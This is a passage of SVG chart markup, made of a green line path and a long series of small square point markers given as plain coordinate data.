201.20253144380592 L 335.81907308377896 201.20253144380592 L 337.7947118241236 201.20253144380592 L 339.77035056446823 201.20253144380592 L 341.74598930481284 201.20253144380592 L 343.7216280451575 201.20253144380592 L 345.6972667855021 201.20253144380592 L 347.6729055258467 201.20253144380592 L 349.6485442661913 201.20253144380592 L 351.624183006536 201.20253144380592 L 353.5998217468806 201.20253144380592 L 355.5754604872252 201.20253144380592 L 357.55109922756986 201.20253144380592 L 359.52673796791447 201.20253144380592 L 361.5023767082591 201.20253144380592 L 363.4780154486037 201.20253144380592 L 365.45365418894835 201.20253144380592 L 367.42929292929296 201.20253144380592 L 369.40493166963756 201.20253144380592 L 371.3805704099822 201.20253144380592 L 373.35620915032683 201.20253144380592 L 375.33184789067144 201.20253144380592 L 377.30748663101605 201.20253144380592 L 379.2831253713607 201.20253144380592 L 381.2587641117053 201.20253144380592 L 383.2344028520499 201.20253144380592 L 385.2100415923946 201.20253144380592 L 387.1856803327392 201.20253144380592 L 389.1613190730838 201.20253144380592 L 391.1369578134284 201.20253144380592 L 393.1125965537731 201.20253144380592 L 395.0882352941177 201.20253144380592" fill="none" stroke="#55BF3B" stroke-width="2"></path><path d="M 392.172 198.172 L 397.828 198.172 397.828 203.828 392.172 203.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 390.172 198.172 L 395.828 198.172 395.828 203.828 390.172 203.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 388.172 198.172 L 393.828 198.172 393.828 203.828 388.172 203.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 386.172 198.172 L 391.828 198.172 391.828 203.828 386.172 203.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 384.172 198.172 L 389.828 198.172 389.828 203.828 384.172 203.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 382.172 198.172 L 387.828 198.172 387.828 203.828 382.172 203.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 380.172 198.172 L 385.828 198.172 385.828 203.828 380.172 203.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 378.672 198.172 L 384.328 198.172 384.328 203.828 378.672 203.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 376.672 198.172 L 382.328 198.172 382.328 203.828 376.672 203.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 374.672 198.172 L 380.328 198.172 380.328 203.828 374.672 203.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 372.672 198.172 L 378.328 198.172 378.328 203.828 372.672 203.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 370.672 198.172 L 376.328 198.172 376.328 203.828 370.672 203.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 368.672 198.172 L 374.328 198.172 374.328 203.828 368.672 203.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 366.672 198.172 L 372.328 198.172 372.328 203.828 366.672 203.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 364.672 198.172 L 370.328 198.172 370.328 203.828 364.672 203.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 362.672 198.172 L 368.328 198.172 368.328 203.828 362.672 203.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 360.672 198.172 L 366.328 198.172 366.328 203.828 360.672 203.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 358.672 198.172 L 364.328 198.172 364.328 203.828 358.672 203.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 356.672 198.172 L 362.328 198.172 362.328 203.828 356.672 203.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 354.672 198.172 L 360.328 198.172 360.328 203.828 354.672 203.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 352.672 198.172 L 358.328 198.172 358.328 203.828 352.672 203.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 350.672 198.172 L 356.328 198.172 356.328 203.828 350.672 203.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 348.672 198.172 L 354.328 198.172 354.328 203.828 348.672 203.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 346.672 198.172 L 352.328 198.172 352.328 203.828 346.672 203.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 344.672 198.172 L 350.328 198.172 350.328 203.828 344.672 203.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 342.672 198.172 L 348.328 198.172 348.328 203.828 342.672 203.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 340.672 198.172 L 346.328 198.172 346.328 203.828 340.672 203.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 338.672 198.172 L 344.328 198.172 344.328 203.828 338.672 203.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 337.172 198.172 L 342.828 198.172 342.828 203.828 337.172 203.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 335.172 198.172 L 340.828 198.172 340.828 203.828 335.172 203.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 333.172 198.172 L 338.828 198.172 338.828 203.828 333.172 203.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 331.172 198.172 L 336.828 198.172 336.828 203.828 331.172 203.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 329.172 198.172 L 334.828 198.172 334.828 203.828 329.172 203.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 327.172 198.172 L 332.828 198.172 332.828 203.828 327.172 203.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 325.172 198.172 L 330.828 198.172 330.828 203.828 325.172 203.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 323.172 198.172 L 328.828 198.172 328.828 203.828 323.172 203.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 321.172 198.172 L 326.828 198.172 326.828 203.828 321.172 203.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 319.172 198.172 L 324.828 198.172 324.828 203.828 319.172 203.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 317.172 198.172 L 322.828 198.172 322.828 203.828 317.172 203.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 315.172 203.172 L 320.828 203.172 320.828 208.828 315.172 208.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 313.172 209.172 L 318.828 209.172 318.828 214.828 313.172 214.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 311.172 216.172 L 316.828 216.172 316.828 221.828 311.172 221.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 309.172 224.672 L 314.828 224.672 314.828 230.328 309.172 230.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 307.172 230.172 L 312.828 230.172 312.828 235.828 307.172 235.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 305.172 230.172 L 310.828 230.172 310.828 235.828 305.172 235.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 303.172 230.172 L 308.828 230.172 308.828 235.828 303.172 235.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 301.172 230.672 L 306.828 230.672 306.828 236.328 301.172 236.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 299.172 233.172 L 304.828 233.172 304.828 238.828 299.172 238.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 297.672 234.172 L 303.328 234.172 303.328 239.828 297.672 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 295.672 234.172 L 301.328 234.172 301.328 239.828 295.672 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 293.672 234.172 L 299.328 234.172 299.328 239.828 293.672 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 291.672 234.172 L 297.328 234.172 297.328 239.828 291.672 239.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 289.672 234.672 L 295.328 234.672 295.328 240.328 289.672 240.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 287.672 235.672 L 293.328 235.672 293.328 241.328 287.672 241.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 285.672 236.172 L 291.328 236.172 291.328 241.828 285.672 241.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 283.672 236.672 L 289.328 236.672 289.328 242.328 283.672 242.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 281.672 236.672 L 287.328 236.672 287.328 242.328 281.672 242.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 279.672 236.672 L 285.328 236.672 285.328 242.328 279.672 242.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 277.672 240.172 L 283.328 240.172 283.328 245.828 277.672 245.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 275.672 247.672 L 281.328 247.672 281.328 253.328 275.672 253.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 273.672 248.672 L 279.328 248.672 279.328 254.328 273.672 254.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 271.672 248.672 L 277.328 248.672 277.328 254.328 271.672 254.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 269.672 250.172 L 275.328 250.172 275.328 255.828 269.672 255.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 267.672 250.172 L 273.328 250.172 273.328 255.828 267.672 255.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 265.672 250.172 L 271.328 250.172 271.328 255.828 265.672 255.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 263.672 250.172 L 269.328 250.172 269.328 255.828 263.672 255.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 261.672 250.172 L 267.328 250.172 267.328 255.828 261.672 255.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 259.672 250.172 L 265.328 250.172 265.328 255.828 259.672 255.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 257.672 250.172 L 263.328 250.172 263.328 255.828 257.672 255.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 256.172 250.172 L 261.828 250.172 261.828 255.828 256.172 255.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 254.172 250.172 L 259.828 250.172 259.828 255.828 254.172 255.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 252.172 250.172 L 257.828 250.172 257.828 255.828 252.172 255.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 250.172 250.172 L 255.828 250.172 255.828 255.828 250.172 255.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 248.172 250.672 L 253.828 250.672 253.828 256.328 248.172 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 246.172 250.672 L 251.828 250.672 251.828 256.328 246.172 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 244.172 250.672 L 249.828 250.672 249.828 256.328 244.172 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 242.172 250.672 L 247.828 250.672 247.828 256.328 242.172 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 240.172 250.672 L 245.828 250.672 245.828 256.328 240.172 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 238.172 250.672 L 243.828 250.672 243.828 256.328 238.172 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 236.172 250.672 L 241.828 250.672 241.828 256.328 236.172 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 234.172 250.672 L 239.828 250.672 239.828 256.328 234.172 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 232.172 250.672 L 237.828 250.672 237.828 256.328 232.172 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 230.172 250.672 L 235.828 250.672 235.828 256.328 230.172 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 228.172 250.672 L 233.828 250.672 233.828 256.328 228.172 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 226.172 250.672 L 231.828 250.672 231.828 256.328 226.172 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 224.172 250.672 L 229.828 250.672 229.828 256.328 224.172 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 222.172 250.672 L 227.828 250.672 227.828 256.328 222.172 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 220.172 250.672 L 225.828 250.672 225.828 256.328 220.172 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 218.172 250.672 L 223.828 250.672 223.828 256.328 218.172 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 216.672 250.672 L 222.328 250.672 222.328 256.328 216.672 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 214.672 250.672 L 220.328 250.672 220.328 256.328 214.672 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 212.672 250.672 L 218.328 250.672 218.328 256.328 212.672 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 210.672 250.672 L 216.328 250.672 216.328 256.328 210.672 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 208.672 250.672 L 214.328 250.672 214.328 256.328 208.672 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 206.672 250.672 L 212.328 250.672 212.328 256.328 206.672 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 204.672 250.672 L 210.328 250.672 210.328 256.328 204.672 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 202.672 250.672 L 208.328 250.672 208.328 256.328 202.672 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 200.672 250.672 L 206.328 250.672 206.328 256.328 200.672 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 198.672 250.672 L 204.328 250.672 204.328 256.328 198.672 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 196.672 250.672 L 202.328 250.672 202.328 256.328 196.672 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 194.672 250.672 L 200.328 250.672 200.328 256.328 194.672 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 192.672 250.672 L 198.328 250.672 198.328 256.328 192.672 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 190.672 250.672 L 196.328 250.672 196.328 256.328 190.672 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 188.672 250.672 L 194.328 250.672 194.328 256.328 188.672 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 186.672 250.672 L 192.328 250.672 192.328 256.328 186.672 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 184.672 250.672 L 190.328 250.672 190.328 256.328 184.672 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 182.672 250.672 L 188.328 250.672 188.328 256.328 182.672 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 180.672 250.672 L 186.328 250.672 186.328 256.328 180.672 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 178.672 250.672 L 184.328 250.672 184.328 256.328 178.672 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 176.672 250.672 L 182.328 250.672 182.328 256.328 176.672 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 175.172 250.672 L 180.828 250.672 180.828 256.328 175.172 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 173.172 250.672 L 178.828 250.672 178.828 256.328 173.172 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 171.172 250.672 L 176.828 250.672 176.828 256.328 171.172 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 169.172 250.672 L 174.828 250.672 174.828 256.328 169.172 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 167.172 250.672 L 172.828 250.672 172.828 256.328 167.172 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 165.172 250.672 L 170.828 250.672 170.828 256.328 165.172 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 163.172 250.672 L 168.828 250.672 168.828 256.328 163.172 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 161.172 250.672 L 166.828 250.672 166.828 256.328 161.172 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 159.172 250.672 L 164.828 250.672 164.828 256.328 159.172 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 157.172 250.672 L 162.828 250.672 162.828 256.328 157.172 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 155.172 250.672 L 160.828 250.672 160.828 256.328 155.172 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 153.172 250.672 L 158.828 250.672 158.828 256.328 153.172 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 151.172 250.672 L 156.828 250.672 156.828 256.328 151.172 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 149.172 250.672 L 154.828 250.672 154.828 256.328 149.172 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 147.172 250.672 L 152.828 250.672 152.828 256.328 147.172 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 145.172 250.672 L 150.828 250.672 150.828 256.328 145.172 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 143.172 250.672 L 148.828 250.672 148.828 256.328 143.172 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 141.172 250.672 L 146.828 250.672 146.828 256.328 141.172 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 139.172 250.672 L 144.828 250.672 144.828 256.328 139.172 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 137.172 250.672 L 142.828 250.672 142.828 256.328 137.172 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 135.672 250.672 L 141.328 250.672 141.328 256.328 135.672 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 133.672 250.672 L 139.328 250.672 139.328 256.328 133.672 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 131.672 250.672 L 137.328 250.672 137.328 256.328 131.672 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 129.672 250.672 L 135.328 250.672 135.328 256.328 129.672 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 127.672 250.672 L 133.328 250.672 133.328 256.328 127.672 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 125.672 250.672 L 131.328 250.672 131.328 256.328 125.672 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 123.672 250.672 L 129.328 250.672 129.328 256.328 123.672 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 121.672 250.672 L 127.328 250.672 127.328 256.328 121.672 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 119.672 250.672 L 125.328 250.672 125.328 256.328 119.672 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 117.672 250.672 L 123.328 250.672 123.328 256.328 117.672 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 115.672 250.672 L 121.328 250.672 121.328 256.328 115.672 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 113.672 250.672 L 119.328 250.672 119.328 256.328 113.672 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 111.672 250.672 L 117.328 250.672 117.328 256.328 111.672 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 109.672 250.672 L 115.328 250.672 115.328 256.328 109.672 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 107.672 250.672 L 113.328 250.672 113.328 256.328 107.672 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 105.672 250.672 L 111.328 250.672 111.328 256.328 105.672 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 103.672 250.672 L 109.328 250.672 109.328 256.328 103.672 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 101.672 250.672 L 107.328 250.672 107.328 256.328 101.672 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 99.672 250.672 L 105.328 250.672 105.328 256.328 99.672 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 97.672 250.672 L 103.328 250.672 103.328 256.328 97.672 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 95.672 250.672 L 101.328 250.672 101.328 256.328 95.672 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 94.172 250.672 L 99.828 250.672 99.828 256.328 94.172 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 92.172 250.672 L 97.828 250.672 97.828 256.328 92.172 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 90.172 250.672 L 95.828 250.672 95.828 256.328 90.172 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 88.172 250.672 L 93.828 250.672 93.828 256.328 88.172 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 86.172 250.672 L 91.828 250.672 91.828 256.328 86.172 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 84.172 250.672 L 89.828 250.672 89.828 256.328 84.172 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 82.172 250.672 L 87.828 250.672 87.828 256.328 82.172 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 80.172 250.672 L 85.828 250.672 85.828 256.328 80.172 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 78.172 250.672 L 83.828 250.672 83.828 256.328 78.172 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 76.172 250.672 L 81.828 250.672 81.828 256.328 76.172 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 74.172 250.672 L 79.828 250.672 79.828 256.328 74.172 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 72.172 250.672 L 77.828 250.672 77.828 256.328 72.172 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 70.172 250.672 L 75.828 250.672 75.828 256.328 70.172 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 68.172 250.672 L 73.828 250.672 73.828 256.328 68.172 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 66.172 250.672 L 71.828 250.672 71.828 256.328 66.172 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 64.172 250.672 L 69.828 250.672 69.828 256.328 64.172 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 62.172 250.672 L 67.828 250.672 67.828 256.328 62.172 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 60.172 250.672 L 65.828 250.672 65.828 256.328 60.172 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 58.172 250.672 L 63.828 250.672 63.828 256.328 58.172 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 56.172 250.672 L 61.828 250.672 61.828 256.328 56.172 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 54.672 250.672 L 60.328 250.672 60.328 256.328 54.672 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 52.672 250.672 L 58.328 250.672 58.328 256.328 52.672 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 50.672 250.672 L 56.328 250.672 56.328 256.328 50.672 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 48.672 250.672 L 54.328 250.672 54.328 256.328 48.672 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 46.672 250.672 L 52.328 250.672 52.328 256.328 46.672 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 44.672 250.672 L 50.328 250.672 50.328 256.328 44.672 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 42.672 250.672 L 48.328 250.672 48.328 256.328 42.672 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 40.672 250.672 L 46.328 250.672 46.328 256.328 40.672 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 38.672 250.672 L 44.328 250.672 44.328 256.328 38.672 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 36.672 250.672 L 42.328 250.672 42.328 256.328 36.672 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 34.672 250.672 L 40.328 250.672 40.328 256.328 34.672 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 32.672 250.672 L 38.328 250.672 38.328 256.328 32.672 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 30.672 250.672 L 36.328 250.672 36.328 256.328 30.672 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 28.672 250.672 L 34.328 250.672 34.328 256.328 28.672 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 26.672 250.672 L 32.328 250.672 32.328 256.328 26.672 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 24.672 250.672 L 30.328 250.672 30.328 256.328 24.672 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 22.672 250.672 L 28.328 250.672 28.328 256.328 22.672 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 20.672 250.672 L 26.328 250.672 26.328 256.328 20.672 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 18.672 250.672 L 24.328 250.672 24.328 256.328 18.672 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 16.672 250.672 L 22.328 250.672 22.328 256.328 16.672 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 14.672 250.672 L 20.328 250.672 20.328 256.328 14.672 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 13.172 250.672 L 18.828 250.672 18.828 256.328 13.172 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 11.172 250.672 L 16.828 250.672 16.828 256.328 11.172 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 9.172 250.672 L 14.828 250.672 14.828 256.328 9.172 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 7.172000000000001 250.672 L 12.828 250.672 12.828 256.328 7.172000000000001 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 5.172000000000001 250.672 L 10.828 250.672 10.828 256.328 5.172000000000001 256.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 3.172 